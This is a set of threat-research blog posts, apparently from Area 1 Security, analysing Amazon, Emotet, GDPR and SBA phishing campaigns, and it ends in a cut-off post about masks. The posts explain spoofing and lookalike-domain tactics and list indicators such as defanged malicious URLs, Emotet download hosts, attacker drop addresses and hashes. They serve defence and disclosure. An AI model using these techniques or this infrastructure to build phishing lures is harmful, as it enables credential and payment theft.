Amazon is a highly spoofed company. Criminals commonly use Amazon to steal sensitive information as a means to bolster their ill-gotten coffers. Targets can be easily tricked by these phishing messages as attackers continually update to more and more timely and convincing lures.Coronavirus-related lockdowns, combined with Prime Day sales, gives cyber criminals the ideal scenario for criminal activity. Instead of perusing shopping aisles with limited capacity and reduced hours, customers rely more than ever on Amazon for daily necessities and now, of course, the highly-anticipated Prime Day deals.

What else makes Prime Day risky in 2020? Many big box retailers cancelling their Black Friday sales in light of the pandemic. This makes Prime Day an even bigger focus for cyber criminals.

This year, attackers are using several advanced tactics to create more convincing messages.

Amazon shoppers should understand the latest methods employed by cyber criminals, in order to avoid falling victim to these types of scams.

Here is the most prevalent phishing lure uncovered by Area 1 Security researchers: An Amazon-branded email states that there is a problem with the credit card linked to the user’s Amazon account, and the customer’s account is “on hold” until the customer can provide updated card information.

This scam, of course, is just an attempt to steal an Amazon Prime member’s credit card data.

We’ve found a number of disparate campaigns leveraging similar lures but with varying levels of sophistication.

The more stealthy phishing messages reveal convincing brand-specific content, carefully constructed to imitate a real Amazon email.

As shown in Figure 1, the content, logo and graphics are in line with what you might encounter in an actual Amazon notification email. The attacker behind this campaign used several advanced tactics to create a convincing message, including:

• Meticulous HTML/CSS coding

• Embedding images from Amazon in the source code

• Hosting malicious content on a legitimate website

• Leveraging Newly Registered Domains (NRDs) to send the phishing messages

This particular campaign used numerous domains to send their phishing messages, all of which were newly registered. The sender email accounts containing these domains followed either one of two patterns:

• no-reply-amazon-notify<11 alphanumeric characters>@<newly registered domain>

• mail-services-amazon-prime-<11 alphanumeric characters>@<newly registered domain>

The phishing messages sent from these accounts contained malicious links that revealed the attacker either leveraged NRDs, or abused the legitimate services of Sniply to host their Amazon look-alike sites.

What is Sniply? It allows users to create custom links with a free user account. As a result, Sniply is an attractive option for attackers looking to find unsuspecting sites to host their nefarious content.

The text “Update Payment Information” in the body of the message is a hyperlink to a presumably spoofed Amazon login page. Area 1 Security observed yet another pattern, this time with the Sniply links:

• hxxps://snip[.]ly/xjey66?.amazon-prime-services=

• hxxps://snip[.]ly/o1u9cb?amazon.data.prime=

• hxxps://snip[.]ly/9axm0u?ad-amazon.isuue-id=

The identification of these patterns in both the sender addresses and malicious links is highly suggestive of a phishing kit.

At the time of our analysis, the pages for these links were no longer accessible. Fortunately, Sniply was quick to the draw and blocked access to the attacker’s malicious content. However, with attackers easily creating Newly Registered Domains, it won’t take long to create a new malicious website and begin another wave of phishing messages.

These ever-evolving Amazon-themed campaigns are an ongoing threat to many individuals and businesses alike. The use of NRDs, as well as abuse of legitimate services, make these phish particularly difficult to detect.

To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this.

Although we recognized and stopped this campaign from reaching users’ inboxes before any damage could be done, there are still similar and ongoing campaigns with active links that are hitting the inboxes of targets without adequate email security.

As malicious actors create new campaigns with increasingly sophisticated tactics, users need to be aware of the latest techniques to stay safe from these opportunistic attacks.

Another Amazon-themed phishing campaign, launched in the days leading up to Prime Day, attempts to convince shoppers that their Prime membership has expired.

This campaign entices the customer to click a link to update card information on file in order to continue enjoying their Prime benefits. In the figure below, you can see that the message is simple, to the point, and — again — contains Amazon branding.

In the example above, the fraudsters used Display Name Spoofing to make the email appear as if it originated from “Amazon Prime”.

However, Area 1 Security’s closer inspection of the email headers reveals that the message has an “envelope-from” address of ad4@dianefloresbrown[.]com and was sent by way of wineu[.]mail.

At the time of analysis, these domains did not resolve to any IP addresses. Further, all IPs appearing in the header were private (or for internal network use only), having no significance outside the local network, and thus providing some degree of anonymity for the attacker.

This particular campaign has been linked to malicious Amazon-related spoofs dating back to 2016, and is still being updated on an almost daily basis.

A number of the phishing websites used by this cyber criminal happen to share a unique URL pattern, allowing for easier tracking of the fraudulent activity.

For example, clicking on the hyperlink for the text “Update your payment method” will result in the victim’s browser loading the malicious content located at, hxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F92a1dd58f9544ab8efd1c744612385a9/?dispatch=KNE0iodoOoqK5tDxLF7q0bbIsyFnO28x2xuq3Qvu5sVyxSL3EE. In an effort to avoid detection and being indexed by various web crawlers, every time the link is clicked, a new URL is generated. Parameters within the URL that vary are detailed below:

• hxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F<hashed and base64-encoded GMT/UTC timestamp>/?dispatch=<randomly generated alphanumeric characters>

After clicking the malicious link, the victim is directed through a series of steps to verify their identity and input payment information. Before being redirected to the real Amazon site, the victim is presented with a screen that displays their account has been successfully updated, and they will be logged out.

The figure below exposes the victim’s journey across multiple Amazon-branded sites:

Figure 4. Sequence of Phishing Attack

As evidenced above, the attacker is attempting to steal not only credit card, but also personally identifying information (PII).

This sensitive data is then sent to the attacker at the addresses btsmpil@gmail[.]com and kabiyesi@zoho[.]com. There are no cookies stored once the target is redirected to the Amazon homepage, indicating that the attack does not attempt to get additional information from the Amazon session.

In a misstep by the attacker, the index of their malicious website was made public (as shown in Figure 5), allowing anyone to view the technical details behind their operation.

Figure 5. Index of Malicious Website

This oversight allowed researchers at Area 1 Security to access the source code for the website and delve into the numerous scripts used to carry out the attack.

Several unique artifacts were discovered that can be used to possibly identify any additional or future campaigns carried out by this attacker. For instance, a number of div classes follow a very similar format:

Figure 6. HTML of Malicious Website

As revealed in the figure above, each of the div classes uses “tajouri” as a prefix for containers, as well as the name of “containtindex”. No information was found as to why this was used as a naming convention, however it might give researchers another possible avenue for associating this cyber criminal with future attacks or phishing kits.

The main index page for the malicious site contains the code responsible for safeguarding its contents from web crawlers and for generating unique URLs for each visitor. As highlighted below, a screen name was identified on this page, “AYB SCH”, among a trove of profanity-laced code. Whether this attacker wanted the code to be discovered in order to gain internet notoriety is up for debate.

An additional artifact was found that offers yet another interesting, if not unique, identifier used by this cyber criminal. The below code comes from the “Account Verification” step of the attack. The specific div class format can be seen once again, as well as what appears to be French text in the HTML’s tags, which is slang for “shut up”.

This source code provides a little insight into the cyber criminals behind these Amazon-themed attacks.

Many of the phishing campaigns appear to originate from overseas, as seen in the ISPs used, and were orchestrated by individuals who are well-versed in programming, if not English expletives. These fraudsters clearly see this as a game, where they hope to outsmart defenses while taunting those that may be hot on their trail.

With cyber criminals well-equipped for the upcoming rush to Prime Day deals, it is vital that companies prepare adequate defenses to protect users from falling victim to these Amazon-themed attacks.

As malicious actors invent new ways to bypass defenses, including the use of newly registered domains and legitimate online services, security practitioners need to turn to solutions on the cutting edge of email security technology in order to block these highly-damaging, financially-driven phishing campaigns.

New tactics and methods may be able to trick legacy vendors and cloud email providers, but Area 1 Security’s anti-phishing solution stops these fraudsters dead in their tracks.

Our advanced Machine Learning and Artificial Intelligence technology allows our algorithms to uncover new tactics malicious actors are using to bypass defenses in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that users are never exposed to the attack.

Sender Domains:

Kimakxbisakok[.]com

kauadalahmantanterinda[.]com

Ikannilakayarasa[.]com

Bilangbabiamadia[.]com

com-accountingproved.com

ad4@dianefloresbrown[.]com

wineu[.]mail

Sender IP Addresses:

36[.]71[.]143[.]138

36[.]68[.]138[.]85

Sender Email Addresses:

no-reply-amazon-notify5jsciki79he@kimakxbisakok[.]com

no-reply-amazon-notify1os6uge0kzh@kimakxbisakok[.]com

no-reply-amazon-notifyhrbdqdoupsz@kauadalahmantanterinda[.]com

no-reply-amazon-notifym55jh93ft92@kauadalahmantanterinda[.]com

no-reply-amazon-notifykf9ul2d33jx@ikannilakayarasa[.]com

no-reply-amazon-notifymn5dzrjbwwc@bilangbabiamadia[.]com

mail-services-amazon-prime-pswrpeavczy@com-accountingproved[.]com

mail-services-amazon-prime-2av302jgvrp@com-accountingproved[.]com

mail-services-amazon-prime-5yww41luv8a@com-accountingproved[.]com

mail-services-amazon-prime-i7a98af4a29@com-accountingproved[.]com

mail-services-amazon-prime-xroq3gqfnm3@com-accountingproved[.]com

Attacker Email Addresses:

btsmpil@gmail[.]com

kabiyesi@zoho[.]com

Malicious Links:

hxxps://snip[.]ly/xjey66?.amazon-prime-services=

hxxps://snip[.]ly/o1u9cb?amazon.data.prime=

hxxps://snip[.]ly/9axm0u?ad-amazon.isuue-id=

hxxps://interistingkostins[.]com/MwM7tEjhxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F<hashed and base64 encoded GMT/UTC timestamp>/?dispatch=<randomly generated alphanumeric characters>

Following the recent return of Emotet after a five-month hiatus, a newly-discovered phishing campaign is using updated tactics by leveraging the hype surrounding President Trump’s decision to halt U.S. funding for the World Health Organization (WHO). In a ruse to drop this dangerous banking trojan, the malicious messages take the form of a typical Political Action Committee (PAC) email, eliciting support for presidential incumbent Donald Trump in the upcoming 2020 election.

First caught by Area 1 Security on August 21st, this ongoing campaign contains all the hallmarks of the resurgence of Emotet:

• Leveraging stolen email content

• Subject lines prefaced with “Fwd:” and ”RE:”

• And PowerShell commands to download and execute the malware

This campaign, however, aims to compromise politically-related entities rather than just the typical targets of opportunity that are commonly associated with this banking trojan. In Figure 1, you can see how the attacker forwards a legitimate PAC mailer to develop a false sense of legitimacy, with entirely authentic content throughout the body of the message. Every link works and leads to benign web pages of the impersonated PAC.

Like a Wolf in sheep’s clothing, the attacker cleverly disguises their Emotet delivery mechanism as messaging about timely and highly publicized, hot-button issues in politics.

Figure 1. Screenshot of phishing message

The subject of the email reads “Fwd:Breaking: President. Trump suspends funding to WHO,” and the attacker employs Display Name Spoofing in an attempt to mask the true sender address. The actual sender addresses used to spread the phishing messages vary, but all have one thing in common: each is a legitimate account compromised by the attacker to launch this fraudulent WHO-themed campaign.

A closer look at the attacker’s infrastructure reveals compromised hosts used in the transfer of the phishing messages, such as the sending Mail Transfer Agent (MTA) server[.]websoftperu[.]com. Area 1 Security suspects that this MTA may have been compromised due to an open port running a very outdated version of OpenSSH (7.4), which has numerous vulnerabilities.

Similarly:

• Compromised email accounts of several small businesses around the world were used in each wave of this campaign, again luring victims with the same stolen PAC email content.

• One of these accounts is also connected to similar phishing messages with slightly different lures, all with the intent to infect targets with Emotet.

• The example account above is, in particular, the source of various politically-themed phishing messages that contain stolen content from a number of different PAC mailers and was observed in the targeting of politically-affiliated email accounts.

The attacker primarily uses compromised accounts to successfully pass email authentication protocols, such as DMARC, DKIM, and SPF.

Whereas other malicious actors may look for sender domains that do not have these protocols configured or configured correctly, this attacker boldly leverages correctly-configured authentication protocols to their advantage. This tactic allows the attacker to bypass legacy vendors that solely rely on these authentication methods to provide indicators of maliciousness.

There is approximately one week of turnover time between each wave of the campaign as the attacker retools to get ahead of defenses. This includes various changes, such as modifying the weaponized attachment and using new compromised sender infrastructure and accounts.

Efforts like this can easily equip the attacker with the ability to circumvent typical signature-based detections that depend on IP addresses and payload hashes of known threats, leading defenders through a never-ending game of “cat and mouse”.

At the bottom of the phishing message, there is a Microsoft Word Document that uses VBA Macros to drop the first-stage payload, the Emotet downloader. After clicking on the document, the user is prompted by a dialog box to enable editing and content, as depicted below.

Figure 2. Screenshot of Dialog Box

Merely clicking this box will enable a highly obfuscated VBA Macro (as shown in Figure 3) that runs an equally obfuscated PowerShell command using Windows Management Instrumentation (WMI).

Figure 3. Screenshot of Macro VBA obfuscated code

The content in Figure 4 shows a sampling of the PowerShell script after Area 1 Security researchers deobfuscated a majority of the code. This script attempts to download Emotet from a list of hardcoded compromised WordPress sites. It first runs through this list of sites (as highlighted below) to determine which are still actively hosting the Emotet trojan.

Figure 4. Screenshot of deobfuscated PowerShell

Area 1 Security found that, among the compromised sites hardcoded in the malware, only the link hxxp://cammis[.]com[.]br/wp-admin/8IArx/ was still active at the time of analysis. Once the final payload is found on a functioning site, it is downloaded to a temporary folder on the victim’s device, located at %userprofiles%\AppData\Local\. From here, a message is sent back to the Emotet command and control (C2) server, confirming that it was successfully downloaded.

Emotet is among some of the most destructive and costly malware, affecting both the public and private sectors. Once this advanced, modular banking trojan compromises a target device, other hosts on the network are at risk of infection, as the malware’s worm-like capabilities allow it to easily self-replicate to other connected devices. Sensitive information on the compromised hosts can be considered free rein, where essentially no data is safe from the attacker.

Since Emotet is primarily delivered via attachments or links in phishing emails, the attacker takes extra measures to ensure their messages will not trigger legacy email security solutions. These tactics range from simply changing the name and hash of the malicious file, to more advanced anti-debugging and host-environment analysis capabilities.

Emotet’s modular Dynamic Link Libraries (DLLs) and polymorphic nature offer the attacker not only continuously evolving capabilities but also effortless evasion of signature-based detection systems. Analysis of this evasive trojan can present challenges for those attempting to reverse the malware, as it is virtual-environment aware and will infinitely sleep in an attempt to render debugging analysis techniques ineffective. With malicious actors using constantly evolving malware, new and advanced techniques are needed to detect and catch these phishing messages before they reach users’ inboxes.

Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology leverage algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real-time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.

Compromised Sender Email Addresses:

accounts@alhilaldecors[.]com

reservas@carentminibus[.]com

sargodha@deluxefootwear[.]com[.]pk

c25@hahncollections[.]co[.]za

Sender IP Addresses:

59[.]127[.]189[.]26

103[.]133[.]214[.]57

175[.]138[.]0[.]109

208[.]109[.]80[.]1

Sender Domains:

Server1[.]gigafield[.]com

Server[.]websoftperu[.]com

Compromised Emotet Websites:

hxxp://cammis[.]com[.]br/wp-admin/8lArx/

hxxps://indiafricatoday[.]com/wp-admin/l0WmSB/

hxxp://gosmartmoving[.]com/wp-content/3QC/

hxxp://ilfacomercial[.]cl/wp-includes/P/

hxxp://hanh[.]cz/blogs/XU/

hxxps://myvanillastuffs[.]xyz/wp-admin/hjL8d/

hxxp://condi-shop[.]ru/wp-includes/nWJ/

Attachment Hashes:

MD5: 031be6a39da92ccedefc3ef3e5cc12aa

SHA1: 1eed6a05b977b6b13a8df2cafed8f1cdf7d53088

SHA256: 5d4bee6f5bb0d02b980f21c2ae731bd12d5de2e2810058e6098fc888a7cc6f7b

SSdeep: 1536:A2Fj72Fjmrdi1Ir77zOH98Wj2gpngh+a9BlJizP:1rfrzOH98ipgnYzP

MD5: 729d528ab5073b012c6dcded3872bb62

SHA1: 1984ee2ffcfc14beec272f671833bf506ab85f72

SHA256: d647fbb82b18f11ade1b505a7f9a065441fe8a187377299900bae27fe4047740

SSdeep: 3072:5Yy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////n:T0uXnWFchmmcI/o1/q1Bw4

MD5: 86b7f3f18a2e57ae66ba824b0c43be01

SHA1: ea1302e16d433653adf3071325bc8c2288b2a85e

SHA256: 874b498a569260ed044256f13bd87d1a3697f02a17a364d2d61ba9005e12cd25

SSdeep: 3072:fYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////k:B0uXnWFchmmcI/o1/N2ODQwKdk

MD5: 7dc4f1c537c0557a3e38106803b43449

SHA1: acd368c99c7071461701bec70dcd113ad028fbbb

SHA256: 08c3d787f8a45044c85e4c95fb935cbab569d48a16dbe511b8abf6b79fa08046

SSdeep: 3072:V4PrXcuQuvpzm4bkiaMQgAlSmrvsPhQVwjZVPg:iDRv1m4bnQgISevsPOVwjZ5g

Attachment File Names:

Report.doc

Resume.doc

LG-7231 Medical report Covid-19.doc

IQ-5125 Medical report Covid-19.doc

PowerShell Executables (file names are a fixed-length, consisting of seven alphanumeric characters):

Qncqa3a.exe

S1xi8fyw.exe

A new campaign is attempting to harvest credentials from several businesses across industry verticals using the European Union’s General Data Protection Regulation (GDPR) compliance as a lure. This phishing message, first caught by Area 1 Security on August 31st, leverages misconceptions regarding GDPR compliance in an effort to steal email login credentials from unsuspecting targets.

The phish uses a classic tactic of creating a false sense of urgency to fool recipients into complying with the request. The attacker lures targets under the pretense that their email security is not GDPR-compliant and requires immediate action. For many who are not versed in GDPR regulations, this phish could be merely taken as more red tape to contend with rather than being identified as a malicious message.

As shown below, the attacker makes use of graphics and clever formatting to give the message a more credible, authoritative appearance. To maintain the illusion that the email originated from a legitimate source, the sender email address is spoofed to appear as an automated message from the security department of the targeted company. In order to stay relevant, the attacker also regularly updates to comply - or “Action required” - date included in the body of the message.

Based on Area 1 Security’s analysis, this campaign is predominantly launched at public-facing emails of the targeted companies, e.g. @.com. However, to a lesser extent, there are instances when individuals are targeted, typically executives and upper management. These individuals often work in the sales department, demonstrating the attacker is purposefully choosing targets who are likely to have access to client data and need to comply with GDPR regulations.

In the initial wave of the campaign, the attacker sent phishing messages from a Virtual Private Server (VPS) IP address belonging to ReadyIDC, 103[.]22[.]183[.]95. Using a VPS allows the attacker a greater degree of anonymity when conducting phishing campaigns since it is extremely difficult to pinpoint their physical location. They are able to leverage all the benefits of using a cloud-based service, as well as the ability to easily spin up new servers in the event that their IP address gets blocked or otherwise identified as phishing infrastructure.

A careful inspection of the headers in one of the first instances of this phish reveals a misstep by the threat actor when launching their campaign. As detailed below, despite successfully spoofing the visible FROM header, the envelope MAIL FROM address divulges that the attacker sent their malicious messages via a Gmail account.

MAIL FROM:<redacted>@gmail.com>
From: noreplysecurityservices@<targeted company’s domain>
To: <public-facing targeted company’s email account>
Subject: User account security alert
Date: 31 Aug 2020 22:17:43 +0700

This mistake is quickly rectified in subsequent phishing messages, where the attacker successfully spoofs not only the visible From address but also the envelope MAIL FROM domain of the targeted companies. However, these “stealthier” messages expose yet another blunder, as evidenced by the presence of a “Disposition-Notification-To” header.  This header indicates that read-receipts are enabled, meaning the attacker will be notified when a target opens the malicious email.  This once again discloses the sender account, which happens to be the same Gmail address as identified in the first wave of the campaign.

On the second day of the campaign (September 1st) the attacker began inserting SMTP HELO commands to tell receiving email servers that the phishing message originated from the target company’s domain, when in fact it came from an entirely different origin. This is a common tactic used by malicious actors to spoof legitimate domains and easily bypass legacy email security solutions. Shown in the following headers, the true origin of the email is the IP address 196[.]53[.]250[.]243:

smtp.pra=noreplysecurityservices@<targeted company’s domain>; spf=None
smtp.mailfrom=noreplysecurityservices@<targeted company’s domain>; spf=None
smtp.helo=postmaster@<targeted company’s domain>
Received: from unknown (HELO <targeted company’s domain>) ([196[.]53[.]250[.]243])
  by <redacted>.com with ESMTP; 01 Sep 2020 05:19:33 -0400
From: noreplysecurityservices@<targeted company’s domain>
To: <email of employee at targeted company>
Subject: Email User security alert
Date: 1 Sep 2020 16:19:07 +0700

The attacker switched to this IP address to launch the second wave of the campaign. Depicted below is a screenshot of a vulnerable and shoddy gaming site, Ran Smok, which is directly accessible via this IP (i.e., hxxp://196[.]53[.]250[.]243). The site links to various web pages that result in “Access denied,” and the IP address has been associated with numerous suspicious websites over the years. An analysis of available services running on the IP address reveals that port 25 (used by the Simple Mail Transfer Protocol, or SMTP) is running in a filtered state, and is most likely how the attacker is sending the phishing messages. A closer look at the list of open ports on the IP address reveals a number of additional services that should never be open to the internet, thus leaving the host at this IP exceedingly vulnerable, and all-the-more enticing to an attacker.

The malicious payload in this phish is a link to a credential harvester, located at hxxps://www[.]techgaia[.]com/wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/?email=. The value of the “email” parameter in the URL will vary depending on the recipient, wherein the threat actor tailors each phishing message by setting this parameter equal to the target’s email address. The link opens up to a simple web page, hosted on a compromised WordPress site, as shown below.

The HTML form on the malicious webpage autopopulates the username field based on the email address found in the URL’s “email” parameter. After clicking “Next,” the page will prompt the user to enter a password. Based on Area 1 Security’s analysis, the page appears to return an error regardless of whether the victim enters a correct password. Stolen credentials are then sent to the attacker via a script located at, hxxps://www[.]techgaia[.]com//wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/l0gin[.]php.

Area 1 Security’s analysis revealed that www[.]techgaia[.]com is the older, now-defunct site for a revamped IT consulting services company. The site was running an outdated version of WordPress (version 4.9.7), making it susceptible to a number of vulnerabilities. Its content has since been removed, and navigating to the domain now results in an HTTP 301 redirect. The vulnerable nature of this site made it easy prey, providing the perfect opportunity for an attacker to insert themselves into the fray and leverage the historic legitimacy of the site to bypass detections. With the ease of compromising unmaintained, vulnerable WordPress sites, it will only take the attacker a matter of days (at most) to resume operations with a new, otherwise legitimate site. As a result, legacy vendors that rely on deny lists to block suspect messages will be one step behind the attacker.

For companies that deal with sensitive customer data, it is important to be knowledgeable in the latest data security and privacy regulations for the respective industry and region. New data privacy laws, such as the California Consumer Protection Act, are requiring businesses to ensure that consumers residing in California are able to opt out of data collection. All the while, GDPR currently remains the most stringent regulation in consumer data privacy. It is vital to communicate with all employees any updates regarding new protocols for handling Personally Identifiable Information (PII) to help ensure those in your organization do not fall victim to phishing attacks that rely on confusion from unclear or nonexistent communication regarding these regulations.

Additionally, it is imperative that employees understand the risks of clicking on unsolicited links and entering sensitive data into unauthorized login portals. However, current technology allows an attacker to easily create a phish that is a pixel-perfect forgery of a legitimate login page. Therefore, the safer, more secure option is to utilize a dedicated security solution; one that uses bleeding-edge technology to verify emails before they arrive in a user’s inbox, removing the risk of accidentally clicking a malicious link or file.

Area 1 Security’s advanced detection techniques, such as blind URL inspection, help stop phishing messages like those seen in this GDPR campaign from reaching customers’ inboxes. Our comprehensive anti-phishing solution includes sophisticated pattern-matching algorithms that allow us to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.

Credential Harvesters:

https://www[.]techgaia[.]com/wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/?email=

https://www\[.\]techgaia\[.\]com//wp-content/email/ID/sign\_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/l0gin\[.\]php

Sender IP Addresses:

196[.]53[.]250[.]243

103[.]22.183[.]95

Congress may be in a deadlock over a second stimulus package, but malicious actors are always ready to pounce on the slightest opportunity to exploit the public’s confusion. The US Small Business Administration (SBA) is being impersonated in Coronavirus-themed phishing messages that leverage unfamiliarity with loan application procedures. With many small businesses relying on loans from the SBA to keep their doors open during the quarantine slump, cyber criminals are capitalizing on delays in loan approvals to swindle businesses.

Since at least April, malicious actors have been impersonating the SBA in various campaigns leveraging diverse Tactics, Techniques and Procedures (TTPs), such as malicious payloads, credential harvesters, and stealthy social engineering, all aimed at severely compromising devices and stealing money from companies. In our “How to Stop Financial Phishing Attacks” webinar earlier this year (available on-demand here), we covered one such campaign, which attempted to spread GuLoader malware.

The latest wave of attacks involves a clever social engineering tactic that can fly under almost any radar. This phishing message does not contain errant red flags that would maladroitly trigger a litany of detections. Unlike the previously observed campaigns, this wave of attacks does not contain any malicious payloads, only a benign attachment named SBA - Disaster Loan Assistance Form.pdf. The attacker opts for a clever and silent attack vector, relying on the target believing the email is indeed from the SBA.

Looking at the email below, it is clear this is not your typical 419 phishing scam, poorly masquerading as an official entity to solicit money. The attacker ensures that even the smallest of details are correct in order to give the message a more credible appearance:

• First, the Sender email address looks entirely legitimate.

• Second, the target’s full name appears in the body of the message, as opposed to just a mere email address, as is often seen in more low-level attacks.

• Lastly, the message is free of typos and the formatting is clean and professional.

The attacker successfully spoofs the FROM headers of the real SBA Disaster Customer Service account, as seen on the left. Unfortunately, replying to this email will not send your Economic Injury Disaster Loan (EIDL) application to the SBA, but instead to the attacker’s account at the malicious Reply-To domain, as shown on the right.

Just days before launching this campaign, the attacker created the malicious Reply-To domain gov-sba[.]us using bogus registration information. Whois details for this newly registered domain (NRD) are shown below.

Domain Name: gov-sba[.]us
Registry Domain ID: D18007599F1554B3DAA9B6AFEA0F4235C-NSR
Registrar WHOIS Server:
Registrar URL: www.psi-usa.info
Updated Date: 2020-08-05T06:22:13Z
Creation Date: 2020-07-31T06:22:09Z
Registry Expiry Date: 2021-07-31T06:22:09Z
Registrar: PSI-USA, Inc. dba Domain Robot
Registrar IANA ID: 151
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C186298DF566447488A165F7E4F5B8F60-NSR
Registrant Name: Krikor Derabrahamian
Registrant Organization:
Registrant Street: Rotenloewengasse 15
Registrant City: Wien
Registrant State/Province: US
Registrant Postal Code: 1090
Registrant Country: US
Registrant Phone: +44.7418440320
Registrant Email: office@teamtours.at
Registrant Application Purpose: P5
Registrant Nexus Category: C31/US
Registry Admin ID: C5DF36C6EB720453A8CB08A1FC96AB740-NSR
Admin Name: Krikor Derabrahamian
Admin Organization:
Admin Street: Rotenloewengasse 15
Admin City: Wien
Admin State/Province: AT
Admin Postal Code: 1090
Admin Country: AT
Admin Phone: +44.7418440320
Admin Email: office@teamtours.at
Admin Application Purpose: P5
Admin Nexus Category: C31/AT
Registry Tech ID: C5651DB7CEC1B420BAE1B3F7BE7E214B0-NSR
Tech Name: Gerald Auer
Tech Organization: World4You Internet Services GmbH
Tech Street: Hafenstrasse 47-51
Tech City: Linz
Tech State/Province: OOE
Tech Postal Code: 4020
Tech Country: AT
Tech Phone: +43.73293035
Tech Fax: +43.7329303510
Tech Email: techadmin@world4you.com
Tech Application Purpose: P5
Tech Nexus Category: C31/AT
Name Server: ns2.world4you.at
Name Server: ns1.world4you.at
DNSSEC: unsigned

NRDs are consistently used by attackers to fool users into taking actions that jeopardize the security of their organization. Phishing that leverages NRDs is a particularly effective tactic for a variety of reasons. For one thing, it is a common attacker technique to circumvent Secure Email Gateways (SEGs). New domains have very little history or presence, which allows them to bypass typical blocklists. In fact, a significant number of campaigns that Area 1 Security catches leverage new domains, which are often ephemeral (active only for about 48 hours or less).

Attackers commonly impersonate trusted entities in order to dupe targets into letting their guard down. This is made all the easier by registering an NRD that is also a malicious look-alike domain, in this case gov-sba[.]com. As a result, the true sender domain, buried deep within an email’s headers, is often overlooked. This is particularly the case when phish are opened via mobile devices, such as cell phones, where true sender domains are often hidden, and only Display Names are provided. What’s more, it requires fairly burdensome actions to reveal this type of information in most mobile device (and other purpose-built) mail clients.

To further con targets into filling out the fraudulent EIDL application, the attacker successfully spoofed the SBA’s legitimate sender address, disastercustomerservice@sba.com. In a stealthy move, the attacker actually inserted an SMTP HELO command, as shown below.

Authentication-Results-Original: 990w8b.myvserver.online;	spf=pass (sender IP
 is 64.44.141.5) smtp.mailfrom=disastercustomerservice@sba.gov
 smtp.helo=sba.gov
Received-SPF: pass (990w8b.myvserver.online: connection is authenticated)
Reply-To: "U.S. Small Business Administration (SBA)" <disastercustomerservice@gov-sba.us>
From: "U.S. Small Business Administration (SBA)" <disastercustomerservice@sba.gov>

The HELO command told the receiving email server to treat the message as if it originated from SBA’s domain, when in fact the sender actually had a completely different domain and IP address, namely 990w8b[.]myvserver[.]online and 64[.]44[.]141[.]5. This resulted in various legacy email security solutions accepting the message for delivery.

A target’s reply to this phish is the lynchpin of the whole scam, given the attached EIDL application requests private financial information. Further, the likelihood of a reply is dramatically increased by the seemingly benign and unassuming nature of this purported government form. In the body of the message, the attacker provides instructions to simply reply to the email with a completed EIDL application, of course making sure to note that all personal and banking details must be correct.

Looking at the PDF below, it’s almost impossible to believe this is a forgery, especially with a valid Office of Management and Budget (OMB) form number. In fact, the PDF closely resembles the legitimate Business Information form of the SBA’s online application for EIDL, and even includes an oath at the bottom certifying that all information is true under penalty of perjury. With this attached PDF the attacker clearly has one goal in mind -- steal sensitive account and routing information from businesses.

The only telltale sign that this application is a forgery can be found buried in the document properties, where no typical target would venture:

• Firstly, as seen below, this PDF was created with Skia, an open-source graphics engine for a variety of web platforms. This is a big deviation from the standard Adobe PDF Library that is used to create such documents.

• Secondly, the document’s timestamp reveals that it was recently created on July 31st, 2020, long after the creation of the legitimate EIDL form.

To thwart these sneaky SBA-themed phish, Area 1 Security uses multiple advanced techniques that leverage insight gained from early identification of attacker campaign infrastructure, enabling superior detection of emails from spoofed domains and accounts. Our anti-phishing service analyzes email for threat indicators, such as recently registered domains, domain name obfuscation, and look-a-like domains. Additionally, the service uses real-time correlation with associated brand infrastructure to verify authenticity.

Area 1 also uses lexical analysis of message body and subject to detect financially driven attacks. Headers are checked for sender display name and true sender mismatches, and SPF, DKIM, and DMARC records are checked to validate the sender. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including those with malicious newly registered domains, that other defenses miss.

The official SBA website provides information on protecting yourself from these scams. The SBA will never proactively contact you for loan applications. If you receive an email asking for additional information regarding an existing loan application, first ensure there is an application number referenced in the email, and it matches your application.

If you suspect that you have received an SBA phishing email, call the Office of Inspector General Hotline at 800-767-0385 or report it online, Office of Inspector General Hotline.

Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology leverages algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real-time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.

Reply-To Address:

disastercustomerservice@gov-sba[.]us

Malicious look-alike NRD:

gov-sba[.]us

Sender IP:

64[.]44[.]141[.]5

Sender Domain:

990w8b[.]myvserver[.]online

It’s no surprise that the world is currently facing a major shortage of the now-iconic blue surgical mask. Once only seen in hospitals and medical dramas, these masks are now the hottest selling streetwear. New state regulations now have businesses saying, “No Shirt, No Shoes, No Mask, No Service.” The incredible demand has led opportunistic businesses to get into the import/export of this vital article.

